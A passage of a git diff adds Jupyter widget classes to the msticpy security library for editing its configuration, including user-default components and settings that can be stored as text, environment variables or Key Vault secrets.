+        curr_val = self.mp_controls.get_value(setting_path)
+        if curr_val is None:
+            curr_val = self._get_default_values(prov_name, conf_path)
+        else:
+            if "." in prov_name:
+                prov, child = prov_name.split(".", maxsplit=1)
+                curr_val = {prov: {child: curr_val}}
+            else:
+                curr_val = {prov_name: curr_val}
+
+        prov_ctrl.value = curr_val
+
+        return prov_ctrl
+
+    def _get_default_values(self, prov_name, conf_path):
+        wkspace = None
+        if "." in prov_name:
+            defn_name, wkspace = prov_name.split(".", maxsplit=1)
+        else:
+            defn_name = "provider"
+        defn_path = f"{conf_path}.{defn_name}"
+        prov_defn = self.mp_controls.get_defn(defn_path)
+        if prov_defn is None:
+            self.set_status(f"No definition for this provider was found: {prov_name}")
+            return {}
+        def_settings = {}
+        for setting, defn in prov_defn.items():
+            st_type, st_opts = defn if isinstance(defn, tuple) else "str", {}
+            if st_type == "bool":
+                def_settings[setting] = st_opts.get("default", False)
+            elif st_type == "str":
+                def_settings[setting] = st_opts.get("default")
+        if wkspace:
+            return {defn_name: {wkspace: def_settings}}
+        return {defn_name: def_settings}
+
+
+# pylint: disable=too-many-ancestors
+class CEAutoLoadComps(CEAutoLoadQProvs):
+    """User Default load components edit component."""
+
+    _COMP_PATH = "UserDefaults.LoadComponents"
+    _DESCRIPTION = "User Defaults - Auto-loaded components"
+    _HELP_TEXT = """
+    Choose the other components to load when you run nbinit.init_notebook().<br>
+
+    This is related to the QueryProvider auto-load section but the parameters
+    here are different.<br>
+    Available components include the following:<br>
+    (the names in parantheses are the names of the global variables used
+    when creating these components - use theses to perform any operations
+    required on the component.)
+    <ul>
+        <li>TILookup (ti_lookup) - Threat Intelligence lookups</li>
+        <li>GeoIpLookup (geoip) - Geolocation of IP address lookups
+        Note: you must specify which GeoIP Provider you wish to use.
+        </li>
+        <li>Notebooklets (nb) - Load the MSTIC notebooklets package. This must be
+        installed in your notebook environment. You must specificy a default
+        query provider for this component.
+        </li>
+        <li>Pivot (pivot) - Load Pivot functions into entities.</li>
+        <li>AzureData (az_data) - Load the AzureData component. Optionally specify
+        the authentication options you want to use.</li>
+        <li>AzureSentinelAPI (azs_api) - Load the AzureSentinel API component. Optionally
+        specify the authentication options you want to use.</li>
+    </ul>
+
+    The last two components also support a "connect" parameter. If this is not
+    set the default is to initiate authentication to the service as soon as
+    the component is loaded. set connect=False to prevent this.
+
+    """
+    _HELP_URI = {
+        "User Defaults": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "msticpyconfig.html#user-defaults"
+        ),
+        "Help on this tab": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "SettingsEditor.html#autoload-component"
+        ),
+    }
+
+    def _get_available_options(self):
+        return list(self.mp_controls.get_defn(self._COMP_PATH).keys())
+
+    def _get_select_opts(self):
+        return list(self.mp_controls.get_value(self._COMP_PATH).keys())
+
+    def _get_settings_ctrls(self, prov_name, conf_path):
+        if not prov_name:
+            return widgets.VBox([], layout=self.no_border_layout("95%"))
+
+        setting_path = f"{conf_path}.{prov_name}"
+        prov_ctrl = self.mp_controls.get_control(setting_path)
+        if not isinstance(prov_ctrl, UserDefLoadComponent):
+            prov_ctrl = UserDefLoadComponent(
+                self.mp_controls, prov_name, self._COMP_PATH
+            )
+            self.mp_controls.set_control(setting_path, prov_ctrl)
+
+        curr_val = self.mp_controls.get_value(setting_path)
+        prov_ctrl.value = curr_val
+        return prov_ctrl
+
+    def _get_default_values(self, prov_name, conf_path):
+        defn_path = f"{conf_path}.{prov_name}"
+        prov_defn = self.mp_controls.get_defn(defn_path)
+        def_settings = {}
+        if prov_defn is None:
+            return {"alias": None}
+        for setting, defn in prov_defn.items():
+            st_type, st_opts = defn if isinstance(defn, tuple) else "str", {}
+            if st_type == "str":
+                def_settings[setting] = st_opts.get("default")
+            elif st_type == "bool":
+                def_settings[setting] = st_opts.get("default", False)
+        return def_settings
diff --git a/msticpy/config/comp_edit.py b/msticpy/config/comp_edit.py
new file mode 100644
index 000000000..48dbf920e
--- /dev/null
+++ b/msticpy/config/comp_edit.py
@@ -0,0 +1,354 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Component Edit base and mixin classes."""
+from abc import ABC, abstractmethod
+from time import sleep
+from typing import Any, Dict, List, Optional, Tuple, Union
+
+import ipywidgets as widgets
+from IPython.display import display
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class CompEditDisplayMixin:
+    """Mixin class with common display methods."""
+
+    def _ipython_display_(self):
+        layout = getattr(self, "layout", None)
+        if layout:
+            display(layout)
+
+    @staticmethod
+    def border_layout(width="95%"):
+        """Return border widget layout."""
+        return widgets.Layout(
+            **{
+                "width": width,
+                "border": "solid gray 1px",
+                "margin": "1pt",
+                "padding": "5pt",
+            }
+        )
+
+    @staticmethod
+    def no_border_layout(width="95%"):
+        """Return no-border widget layout."""
+        return widgets.Layout(**{"width": width, "margin": "1pt", "padding": "5pt"})
+
+
+# pylint: disable=too-few-public-methods
+class CompEditUtilsMixin:
+    """Mixin class with common display methods."""
+
+    @staticmethod
+    def _get_settings_path(settings, path):
+        path_elems = path.split(".")
+        curr_node = settings
+        for elem in path_elems:
+            curr_node = curr_node.get(elem)
+            if curr_node is None:
+                break
+        return curr_node
+
+
+class CompEditStatusMixin:
+    """Mixin class with with status label."""
+
+    testing = False
+    status = widgets.Label(layout=widgets.Layout(width="99%"))
+
+    def set_status(self, status, timeout: float = 3.0):
+        """Set the status text."""
+        self.status.value = status
+        if timeout == 0 or self.testing:
+            return
+        sleep(timeout)
+        self.clear_status()
+
+    def clear_status(self):
+        """Clear the status text."""
+        self.status.value = ""
+
+
+class CompEditHelp:
+    """Class to add help control."""
+
+    _DEFAULT_URI = {
+        "MSTICPy Config": (
+            "https://msticpy.readthedocs.io/en/latest/"
+            + "getting_started/msticpyconfig.html"
+        )
+    }
+    _HELP_STYLE = "color: blue; text-decoration: underline;"
+
+    def __init__(self, help_text: str = "", help_uri: Dict[str, str] = None):
+        """
+        Create help sub-component.
+
+        Parameters
+        ----------
+        help_text : str, optional
+            The help string (HTML), by default ""
+        help_uri : Dict[str, str], optional
+            Dict of named URIs {disp_txt: URI}, by default None
+
+        """
+        self.html_help = widgets.HTML()
+        self.accdn_help = widgets.Accordion(children=[self.html_help])
+        self.accdn_help.set_title(0, "Help")
+        self.accdn_help.selected_index = None
+        self.set_help(help_text, help_uri)
+
+    def set_help(self, help_text: str = "", help_uri: Dict[str, str] = None):
+        """Set the help string (HTML) and URIs."""
+        if not help_uri:
+            help_uri = self._DEFAULT_URI
+        help_uris = "<br>".join(
+            f"<a href='{uri}' target='_blank' style='{self._HELP_STYLE}'>Online: {title}</a>"
+            for title, uri in help_uri.items()
+        )
+        help_text = "<br>".join(
+            [
+                help_text,
+                help_uris,
+            ]
+        )
+        self.html_help.value = help_text
+
+    @property
+    def layout(self):
+        """Return the parent widget."""
+        return self.accdn_help
+
+
+class CompEditFrame(CompEditDisplayMixin, CompEditUtilsMixin, CompEditStatusMixin):
+    """Edit frame class for components."""
+
+    def __init__(self, description: str = None):
+        """Initialize the class. Set a label with `description` as content."""
+        self.inner_frame = widgets.HBox(layout=self.border_layout("99%"))
+        self.description = widgets.Label(value=description or "")
+        # self.description.style = {"visibility": "visible" if description else "hidden"}
+        self.help = CompEditHelp()
+        # self.status = widgets.Label(layout=widgets.Layout(width="99%"))
+        self.layout = widgets.VBox(
+            [self.description, self.inner_frame, self.help.layout, self.status]
+        )
+
+
+class CompEditItemButtons:
+    """Component class to add default buttons."""
+
+    def __init__(self):
+        """Initialize the class."""
+        btn_layout = widgets.Layout(width="100px")
+        self.btn_add = widgets.Button(
+            description="Add",
+            tooltip="Add provider/item in drop-down to your settings.",
+            layout=btn_layout,
+        )
+        self.btn_del = widgets.Button(
+            description="Delete",
+            tooltip="Remove selected provider/item from your settings.",
+            layout=btn_layout,
+        )
+        self.btn_save = widgets.Button(
+            description="Update",
+            tooltip="Confirms updates to the settings changes",
+            layout=btn_layout,
+        )
+        self.layout = widgets.HBox([self.btn_add, self.btn_del, self.btn_save])
+
+
+class CompEditItems(CompEditFrame):
+    """Base class for item list and edit controls."""
+
+    def __init__(self, description: str):
+        """Initialize the class. Set a label with `description` as content."""
+        super().__init__(description=description)
+        self.select_item = widgets.Select(
+            layout=widgets.Layout(height="200px", width="99%")
+        )
+        self.edit_frame = widgets.VBox(layout=self.border_layout("99%"))
+        self.edit_buttons = CompEditItemButtons()
+        self.items_frame = widgets.VBox(
+            [
+                self.select_item,
+                widgets.HBox([self.edit_buttons.btn_add, self.edit_buttons.btn_del]),
+            ],
+            layout=self.no_border_layout(width="40%"),
+        )
+        self.inner_frame.children = [
+            self.items_frame,
+            widgets.VBox(
+                [self.edit_frame, self.edit_buttons.btn_save],
+                layout=widgets.Layout(width="99%"),
+            ),
+        ]
+
+
+class CompEditSimple(CompEditFrame):
+    """Base class for simple component with only edit controls."""
+
+    def __init__(self, description: str):
+        """Initialize the class. Set a label with `description` as content."""
+        super().__init__(description=description)
+        self.edit_frame = widgets.VBox(layout=self.border_layout("100%"))
+        self.btn_save = widgets.Button(
+            description="Update", tooltip="Confirms updates to the settings changes"
+        )
+        self.container = widgets.VBox(
+            [self.edit_frame, self.btn_save], layout=self.no_border_layout("100%")
+        )
+        self.inner_frame.children = [self.container]
+
+
+class CEItemsBase(CompEditItems, ABC):
+    """Base class for components containing an item list."""
+
+    _DESCRIPTION = "No description"
+    _COMP_PATH = ""
+    _HELP_TEXT = """"""
+    _HELP_URI = {
+        "MSTICPy Configuration": (
+            "https://msticpy.readthedocs.io/en/latest/"
+            + "getting_started/msticpyconfig.html"
+        )
+    }
+
+    def __init__(self, mp_controls):
+        """Initialize the class. Set the controls and retrieve settings."""
+        super().__init__(description=self._DESCRIPTION)
+
+        self.mp_controls = mp_controls
+        self.comp_defn = self.mp_controls.get_defn(self._COMP_PATH)
+        self.settings = self.mp_controls.get_value(self._COMP_PATH)
+
+        self.help.set_help(self._HELP_TEXT, self._HELP_URI)
+
+        self.controls = {}
+
+
+class SettingsControl(ABC):
+    """Abstract base class for settings controls."""
+
+    @property
+    @abstractmethod
+    def value(self) -> Union[str, Dict[str, Optional[str]]]:
+        """Return the current value of the control."""
+
+    @value.setter
+    def value(self, value: Union[str, Dict[str, Optional[str]]]):
+        """Set value of controls from dict."""
+
+
+CETabControlDef = Tuple[type, Union[List[Any], Dict[str, Any]]]
+
+
+class CompEditTabs:
+    """Tab class."""
+
+    def __init__(self, tabs: Optional[Dict[str, CETabControlDef]] = None):
+        """
+        Initialize the CompEditTabs class.
+
+        Parameters
+        ----------
+        tabs : Optional[Dict[str, Tuple[type, Union[List[Any], Dict[str, Any]]]]], optional
+            Tab definitions or contents, by default None.
+            Each definition can be a Tuple of class and list of args
+            or a Tuple of class and dict of kwargs.
+
+        """
+        self.tab = widgets.Tab()
+        self.layout = self.tab
+        tabs = tabs or {}
+        self._tab_state: List[widgets.Widget] = []
+        self._tab_lazy_load: Dict[int, CETabControlDef] = {}
+        self._tab_names: List[str] = []
+        self.controls: Dict[str, Any] = {}
+        if tabs:
+            for tab_name, tab_ctrl in tabs.items():
+                if isinstance(tab_ctrl, CEItemsBase):
+                    # if this is an already-instantiated widget, just add the tab
+                    self.add_tab(tab_name, tab_ctrl)
+                    self._tab_state.append(tab_ctrl.layout)
+                elif isinstance(tab_ctrl, tuple):
+                    # if we're doing lazy loading, add a lazy-load tab
+                    self._add_lazy_tab(tab_name, tab_ctrl)
+            if self._tab_lazy_load:
+                # Make sure content is loaded for tab 0
+                self._load_tab(0)
+        self.tab.observe(self._on_select_tab, names="selected_index")
+
+    def _load_tab(self, tab_index):
+        """Load any lazily-loaded tab content."""
+        if not self._tab_lazy_load:
+            return
+        if isinstance(self._tab_state[tab_index], widgets.Label):
+            wgt_cls, args = self._tab_lazy_load[tab_index]
+            # initialize the class object with args or kwargs
+            ctrl = wgt_cls(*args) if isinstance(args, list) else wgt_cls(**args)
+            # set this control as the current tab state
+            self._tab_state[tab_index] = ctrl.layout
+            # update the controls dict
+            self.controls[self._tab_names[tab_index]] = ctrl
+            # update the tab control children with the new state
+            self.tab.children = self._tab_state
+
+    def _on_select_tab(self, change):
+        """Handle tab select index events."""
+        tab_index = change.get("new")
+        self._load_tab(tab_index)
+
+    def add_tab(self, tab_name: str, control: CEItemsBase):
+        """Add a tab with name `tab_name` and content `control`."""
+        self._tab_names.append(tab_name)
+        new_idx = len(self._tab_state)
+        self._tab_state.append(control.layout)
+        self.tab.children = self._tab_state
+        self.tab.set_title(new_idx, tab_name)
+        self.controls[tab_name] = control
+
+    def _add_lazy_tab(self, tab_name: str, control_def: CETabControlDef):
+        """Add a lazily-loaded tab with name `tab_name` and definition `control_def`."""
+        self._tab_names.append(tab_name)
+        new_idx = len(self._tab_state)
+        # add dummy control to tab state and control def to lazy tab dict
+        dummy_ctrl = widgets.Label(value="loading...")
+        self._tab_state.append(dummy_ctrl)
+        self._tab_lazy_load[new_idx] = control_def
+        self.controls[tab_name] = dummy_ctrl
+        # Refresh tab control children and set title
+        self.tab.children = self._tab_state
+        self.tab.set_title(new_idx, tab_name)
+
+    def set_tab(self, tab_name: Optional[str], index: int = 0):
+        """Programatically set the tab by name or index."""
+        if tab_name:
+            tab_index = [
+                idx
+                for idx, tabname in enumerate(self._tab_names)
+                if tab_name.casefold() == tabname.casefold()
+            ]
+            if tab_index:
+                self.tab.selected_index = tab_index[0]
+            return
+        self.tab.selected_index = index
+
+    @property
+    def tab_names(self) -> List[str]:
+        """Return a list of current tabs."""
+        return self._tab_names
+
+    @property
+    def tab_controls(self) -> Dict[str, Any]:
+        """Return a list of current tab names and controls."""
+        return self.controls
diff --git a/msticpy/config/compound_ctrls.py b/msticpy/config/compound_ctrls.py
new file mode 100644
index 000000000..5a9d8464c
--- /dev/null
+++ b/msticpy/config/compound_ctrls.py
@@ -0,0 +1,551 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Compound control classes."""
+import os
+from copy import deepcopy
+from typing import Any, Dict, Optional, Tuple, Union
+
+import ipywidgets as widgets
+
+from .._version import VERSION
+
+try:
+    from ..common.keyvault_client import BHKeyVaultClient, MsticpyKeyVaultConfigError
+    from ..common.secret_settings import SecretsClient
+
+    _KEYVAULT = True
+except ImportError:
+    _KEYVAULT = False
+from .ce_common import print_debug, py_to_widget, widget_to_py
+from .comp_edit import CompEditDisplayMixin, CompEditStatusMixin, SettingsControl
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+STORE_TEXT = "Text"
+STORE_ENV_VAR = "EnvironmentVar"
+STORE_KEYVAULT = "KeyVault"
+
+
+class ArgControl(SettingsControl, CompEditStatusMixin):
+    """Args setting element edit component."""
+
+    def __init__(
+        self,
+        setting_path: Optional[str],
+        name: str,
+        store_type: str = STORE_TEXT,
+        item_value: Any = None,
+    ):
+        """
+        Initialize and ArgControl object.
+
+        Parameters
+        ----------
+        setting_path : Optional[str], optional
+            The full path to the setting (minus the name)
+        name : str
+            The name of the setting
+        store_type : str, optional
+            The storage type for the setting value, by default "Text"
+            Other options are "EnvironmentVar" and "KeyVault"
+        item_value : Any, optional
+            The value of the setting, by default None
+            Note None is a legitimate value for store_type "KeyVault"
+
+        """
+        self.setting_path = setting_path
+        self.name = name
+        self.kv_client = None
+
+        self.lbl_setting = widgets.Label(
+            value=self.name, layout=widgets.Layout(width="130px")
+        )
+        self.rb_store_type = widgets.RadioButtons(
+            options=[STORE_TEXT, STORE_ENV_VAR, STORE_KEYVAULT],
+            description="Storage:",
+            layout=widgets.Layout(width="35%"),
+            style={"description_width": "100px"},
+        )
+        self.rb_store_type.value = store_type
+        if isinstance(item_value, bool):
+            self.txt_val = widgets.Checkbox(description="Value")
+        else:
+            if item_value is None:
+                item_value = ""
+            self.txt_val = widgets.Text(
+                description="Value" if store_type == STORE_TEXT else store_type,
+                layout=widgets.Layout(width="99%"),
+                style={"description_width": "100px"},
+                value=str(item_value) or "",
+            )
+        # KeyVault settings
+        self.cb_kv_def = widgets.Checkbox(description="Def KV Path")
+        self.btn_add_kv_secret = widgets.Button(description="Upload to KV")
+        self.btn_add_kv_secret.on_click(self._set_kv_secret)
+        self.cb_kv_def.value = not bool(item_value)
+        self._set_kv_visibility()
+        contents_hbox = widgets.HBox(
+            [
+                self.rb_store_type,
+                widgets.VBox(
+                    [self.txt_val, self.cb_kv_def, self.btn_add_kv_secret],
+                    layout=widgets.Layout(width="64%"),
+                ),
+            ]
+        )
+        self.hbox = widgets.VBox(
+            [self.lbl_setting, contents_hbox, self.status],
+            layout=CompEditDisplayMixin.no_border_layout("99%"),
+        )
+
+        self.cb_kv_def.observe(self._disable_txt, names="value")
+        self.rb_store_type.observe(self._change_store, names="value")
+
+    @property
+    def value(self) -> Union[str, Dict[str, Optional[str]]]:
+        """
+        Return the value of the control.
+
+        Returns
+        -------
+        Union[str, Dict[str, Optional[str]]]
+            Either a string value or a dict of:
+            {"EnvironmentVar": value} or
+            {"KeyVault": value or None}
+
+        """
+        if self.rb_store_type.value == STORE_TEXT:
+            return widget_to_py(self.txt_val)
+        return {self.rb_store_type.value: widget_to_py(self.txt_val)}
+
+    @value.setter
+    def value(self, value: Union[str, Dict[str, Optional[str]]]):
+        """
+        Set control to value.
+
+        Parameters
+        ----------
+        value : Union[str, Dict[str, Optional[str]]]
+            Either a str or a dict of:
+            .. parsed_literal::
+
+                {"Text": value} or
+                {"EnvironmentVar": value} or
+                {"KeyVault": value or None}
+
+        """
+        print_debug("_ArgControl setter val:", value)
+        if not isinstance(value, dict):
+            self.txt_val.value = py_to_widget(value, val_type="str")
+            self.rb_store_type.value = STORE_TEXT
+            return
+        store_type, store_val = next(iter(value.items()))
+        self.txt_val.value = py_to_widget(store_val, val_type="str")
+        self.rb_store_type.value = store_type
+        self.cb_kv_def.value = not bool(store_val)
+        self._set_kv_visibility()
+
+    def _change_store(self, change):
+        """Handle event for store type radio button."""
+        st_type = change.get("new")
+        self.txt_val.description = "Value" if st_type == STORE_TEXT else st_type
+        self._set_kv_visibility()
+        self.lbl_setting.value = st_type
+        if st_type == STORE_KEYVAULT and not self.txt_val.value:
+            self.cb_kv_def.value = True
+
+    def _disable_txt(self, change):
+        """Disable the text field if KeyVault and kv_def_enabled."""
+        if self.rb_store_type.value != STORE_KEYVAULT:
+            return
+        kv_def_enabled = change.get("new")
+        if kv_def_enabled:
+            self.txt_val.value = ""
+        self.txt_val.disabled = kv_def_enabled
+
+    def _set_kv_visibility(self):
+        """Set the visibility of the keyvault-related controls."""
+        if self.rb_store_type.value == STORE_KEYVAULT:
+            self.cb_kv_def.layout.visibility = "visible"
+            self.btn_add_kv_secret.layout.visibility = "hidden"
+        else:
+            self.cb_kv_def.layout.visibility = "hidden"
+            self.btn_add_kv_secret.layout.visibility = "visible"
+
+    def _set_kv_secret(self, btn):
+        """Try to store the current value to key vault."""
+        del btn
+        if not self.setting_path:
+            self.set_status("No setting path to create KV secret name.")
+            return
+        sec_value = None
+        if self.rb_store_type.value == STORE_TEXT:
+            sec_value = self.txt_val.value
+        elif self.rb_store_type.value == STORE_ENV_VAR:
+            sec_value = os.environ.get(self.txt_val.value.strip())
+        else:
+            return
+        if not sec_value:
+            self.set_status("No secret value to store.")
+            return
+        kv_client = self.kv_client
+        if _KEYVAULT:
+            result, status, kv_client = _set_kv_secret_value(
+                setting_path=self.setting_path,
+                item_name=self.name,
+                value=sec_value,
+                kv_client=kv_client,
+            )
+        else:
+            self.set_status("Azure keyvault support is not installed.")
+            return
+        if result:
+            self.set_status(status)
+            self.kv_client = kv_client
+            self.rb_store_type.value = STORE_KEYVAULT
+            self.txt_val.value = ""
+            self.cb_kv_def.value = True
+        else:
+            self.set_status("Error saving secret: status")
+
+
+def _get_args_val(arg_setting):
+    """Return a dict whether the value is a str or a dict."""
+    _, arg_val = next(iter(arg_setting.items()))
+    if isinstance(arg_val, (str, int, bool)):
+        return STORE_TEXT, arg_val
+    return next(iter(arg_val.items()))
+
+
+def get_arg_ctrl(setting_path, var_name, mp_controls):
+    """Create the ArgControl based on the current value of the setting."""
+    var_path = f"{setting_path}.{var_name}"
+    arg_ctrl = mp_controls.get_control(var_path)
+    curr_val = mp_controls.get_value(var_path)
+
+    print_debug(var_name)
+    if arg_ctrl is None:
+        if curr_val is not None:
+            store_type, store_val = _get_args_val({var_name: curr_val})
+        else:
+            store_type, store_val = STORE_TEXT, ""
+        arg_ctrl = ArgControl(
+            setting_path=setting_path,
+            name=var_name,
+            store_type=store_type,
+            item_value=store_val,
+        )
+        mp_controls.set_control(var_path, arg_ctrl)
+    else:
+        arg_ctrl.value = curr_val
+    return arg_ctrl
+
+
+if _KEYVAULT:
+
+    def _set_kv_secret_value(
+        setting_path: str,
+        item_name: str,
+        value: str,
+        kv_client: Any = None,
+    ) -> Tuple[bool, str, Any]:
+        """
+        Set the Key Vault secret to `value`.
+
+        Parameters
+        ----------
+        setting_path : str
+            The setting path (parent path)
+        item_name : str
+            The setting name
+        value : str
+            The value to store
+        kv_client : Optional[BHKeyVaultClient], optional
+            Cached Key Vault secrets client if one is already
+            attached to the ArgControl, by default None
+
+        Returns
+        -------
+        Tuple[bool, str, Optional[BHKeyVaultClient]]
+            True - if success
+            Status - status string
+            KeyVault secrets client (used to cache the client)
+
+        """
+        try:
+            secret_name = SecretsClient.format_kv_name(f"{setting_path}.{item_name}")
+            kv_client = kv_client or BHKeyVaultClient()
+            kv_client.set_secret(secret_name, value)
+            return True, f"Saved as {secret_name}", kv_client
+        except MsticpyKeyVaultConfigError:
+            return False, "Missing or invalid Key Vault configuration", None
+        except Exception as err:  # pylint: disable=broad-except
+            return False, str(err), None
+
+else:
+
+    def _set_kv_secret_value(
+        setting_path: str,
+        item_name: str,
+        value: str,
+        kv_client: Any = None,
+    ) -> Tuple[bool, str, Any]:
+        """Return empty response function if Key Vault cannot be initialized."""
+        del setting_path, item_name, value, kv_client
+        return False, "Azure keyvault libraries are not installed", None
+
+
+class UserDefQryProvCtrl(SettingsControl):
+    """User Defaults Query Provider edit component."""
+
+    def __init__(self, prov_name: str):
+        """
+        Initialize the control.
+
+        Parameters
+        ----------
+        prov_name : str
+            The query provider name
+
+        """
+        self.prov_name = prov_name
+        self.prov_type = "Workspace"
+        self._set_prov_name(prov_name)
+        w_style = {"description_width": "100px"}
+
+        self.txt_alias = widgets.Text(description="Alias", style=w_style)
+        self.cb_connect = widgets.Checkbox(description="Auto-connect", style=w_style)
+        self.layout = widgets.VBox(
+            [self.lbl_type, widgets.VBox([self.txt_alias, self.cb_connect])]
+        )
+
+    def _set_prov_name(self, prov_name):
+        """
+        Set the provider name.
+
+        Notes
+        -----
+        The provider name can be a simple string or a compound,
+        dotted string (in the case of AzureSentinel it will be of the form
+        AzureSentinel.WorkspaceName)
+
+        """
+        self.prov_name = prov_name
+        self.prov_type = "Workspace" if "." in prov_name else "Provider"
+        self.lbl_type = widgets.Label(
+            value=f"{self.prov_name} ({self.prov_type})",
+            layout=widgets.Layout(width="300px"),
+        )
+
+    @property
+    def value(self) -> Union[str, Dict[str, Optional[str]]]:
+        """
+        Return the current value of the control.
+
+        Returns
+        -------
+        Union[str, Dict[str, Optional[str]]]
+            The value dict.
+            In cases where optional 'alias' and 'connect' settings
+            are not used this will be an empty dictionary.
+
+        """
+        alias = {"alias": self.txt_alias.value} if self.txt_alias.value else {}
+        connect = (
+            {"connect": self.cb_connect.value} if not self.cb_connect.value else {}
+        )
+        return {**alias, **connect}
+
+    @value.setter
+    def value(self, value: Union[str, Dict[str, Optional[str]]]):
+        """
+        Set the value of the component from settings.
+
+        Parameters
+        ----------
+        value : Optional[Dict[str, str]]
+            The current value to set in the control.
+
+        """
+        if not value or isinstance(value, str):
+            value = {}
+        self.txt_alias.value = value.get("alias", "")
+        self.cb_connect.value = value.get("connect", True)
+
+
+class UserDefLoadComponent(SettingsControl):
+    """User Defaults Load component edit component."""
+
+    _W_STYLE = {"description_width": "100px"}
+
+    # pylint: disable=line-too-long
+    def __init__(
+        self, mp_controls: MpConfigControls, comp_name: str, setting_path: str
+    ):
+        """
+        Initialize the control.
+
+        Parameters
+        ----------
+        mp_controls : MpConfigControls
+            Msticpy configu controls data store.
+        comp_name : str
+            Component name
+        setting_path : str
+            Path to setting (minus comp_name)
+
+        """
+        # pylint: enable=line-too-long
+        self.comp_name = comp_name
+
+        self.comp_path = f"{setting_path}.{comp_name}"
+        self.control_map = deepcopy(mp_controls.get_defn(self.comp_path))
+        self.controls = {}
+        self.controls["label"] = widgets.Label(value=self.comp_name)
+
+        # build controls from dict
+        self._create_controls(self.comp_path, mp_controls)
+
+    def _create_controls(self, path, mp_controls):
+        """Create controls from settings."""
+        comp_defn = mp_controls.get_defn(path)
+        # If the setting is a simple string - no configurable elements
+        if comp_defn is None:
+            self.controls["no_settings"] = widgets.Label(
+                value="No settings for this component."
+            )
+            return
+
+        if not isinstance(comp_defn, dict):
+            raise TypeError(f"component definition type is invalid {type(comp_defn)}")
+
+        for name, settings in comp_defn.items():
+            curr_value = mp_controls.get_value(f"{path}.{name}")
+            if settings is None:
+                self.controls["no_settings"] = widgets.Label(
+                    value="No settings for this component."
+                )
+                return
+            ctrl_path = f"{path}.{name}"
+            if isinstance(settings, str):
+                # Simple case of a string value
+                self.controls[name] = widgets.Text(
+                    description="Value", value=curr_value or ""
+                )
+                self._add_control_to_map(ctrl_path, self.controls[name])
+            if isinstance(settings, tuple):
+                # if tuple then the second elem of the tuple is the type defn
+                self.controls[name] = self._create_select_ctrl(
+                    settings, name, curr_value
+                )
+                self._add_control_to_map(ctrl_path, self.controls[name])
+            elif isinstance(settings, dict):
+                self.controls[name] = widgets.Text(value=name, disabled=True)
+                self._create_controls(ctrl_path, mp_controls)
+
+    def _add_control_to_map(self, path, ctrl):
+        """Set a value at dotted path location in self.control_map dict."""
+        ctrl_path = path.replace(f"{self.comp_path}.", "")
+        ctrl_map = self.control_map
+        for elem in ctrl_path.split("."):
+            if not isinstance(ctrl_map.get(elem), dict):
+                ctrl_map[elem] = ctrl
+                break
+            ctrl_map = ctrl_map.get(elem)
+
+    @property
+    def value(self) -> Union[str, Dict[str, Optional[str]]]:
+        """
+        Return the current value of the control.
+
+        Returns
+        -------
+        Optional[Dict[str, Any]]
+            Control value dictionary.
+
+        """
+        return self._get_val_from_ctrl(self.control_map)
+
+    @value.setter
+    def value(self, value: Union[str, Dict[str, Optional[str]]]):
+        """Set value of controls from dict."""
+        if isinstance(value, dict):
+            self._set_ctrl_from_val(path="", value=value)
+
+    def _get_val_from_ctrl(self, val_dict):
+        """Recursive get values from control dictionary."""
+        ctrl_val = {}
+        if not val_dict:
+            return val_dict
+        for name, value in val_dict.items():
+            if isinstance(value, widgets.Label):
+                continue
+            if isinstance(value, dict):
+                ctrl_val[name] = self._get_val_from_ctrl(value)
+            elif isinstance(value, widgets.Widget):
+                ctrl_val[name] = widget_to_py(ctrl=value)
+            else:
+                ctrl_val[name] = value
+        return ctrl_val
+
+    def _set_ctrl_from_val(self, path, value):
+        if value is None:
+            return
+        for key, val in value.items():
+            sub_path = f"{path}.{key}" if path else key
+            if isinstance(val, dict):
+                if isinstance(self.controls[key], widgets.Textarea):
+                    self.controls[key].value = py_to_widget(
+                        val, ctrl=self.controls[key]
+                    )
+                else:
+                    self._set_ctrl_from_val(sub_path, val)
+            elif key in self.controls:
+                self.controls[key].value = py_to_widget(val, ctrl=self.controls[key])
+
+    @property
+    def layout(self):
+        """Return the widget layout for the control."""
+        return widgets.VBox(list(self.controls.values()))
+
+    def _create_select_ctrl(self, ctrl_defn, name, curr_value):
+        val_type, val_opts = ctrl_defn
+        if curr_value is None:
+            curr_value = val_opts.get("default")
+
+        if val_type == "str":
+            return widgets.Text(
+                description=name,
+                value=py_to_widget(curr_value, val_type=val_type),
+                style=self._W_STYLE,
+            )
+        if val_type == "bool":
+            if isinstance(curr_value, str):
+                curr_value = curr_value.casefold() == "true"
+            return widgets.Checkbox(
+                description=name,
+                value=py_to_widget(curr_value, val_type=val_type),
+                style=self._W_STYLE,
+            )
+        if val_type in ("enum", "m_enum"):
+            return widgets.SelectMultiple(
+                description=name,
+                options=val_opts.get("options"),
+                value=curr_value or [],
+                style=self._W_STYLE,
+            )
+        if val_type == "txt_dict":
+            wgt = widgets.Textarea(
+                description=name,
+                style=self._W_STYLE,
+            )
+            setattr(wgt, "tag", "txt_dict")
+            wgt.value = py_to_widget(curr_value, ctrl=wgt) or ""
+            return wgt
+        raise TypeError(f"Unknown definition type {val_type} for {name}/{ctrl_defn}")
diff --git a/msticpy/config/file_browser.py b/msticpy/config/file_browser.py
new file mode 100644
index 000000000..2d90336ca
--- /dev/null
+++ b/msticpy/config/file_browser.py
@@ -0,0 +1,179 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""File Browser class."""
+from pathlib import Path
+from typing import Any, Callable, List, Optional, Tuple
+
+import ipywidgets as widgets
+
+from .._version import VERSION
+from .comp_edit import CompEditDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-instance-attributes
+class FileBrowser(CompEditDisplayMixin):
+    """File system browser control."""
+
+    PARENT = ".."
+
+    def __init__(self, path: str = ".", select_cb: Callable[[str], Any] = None):
+        """
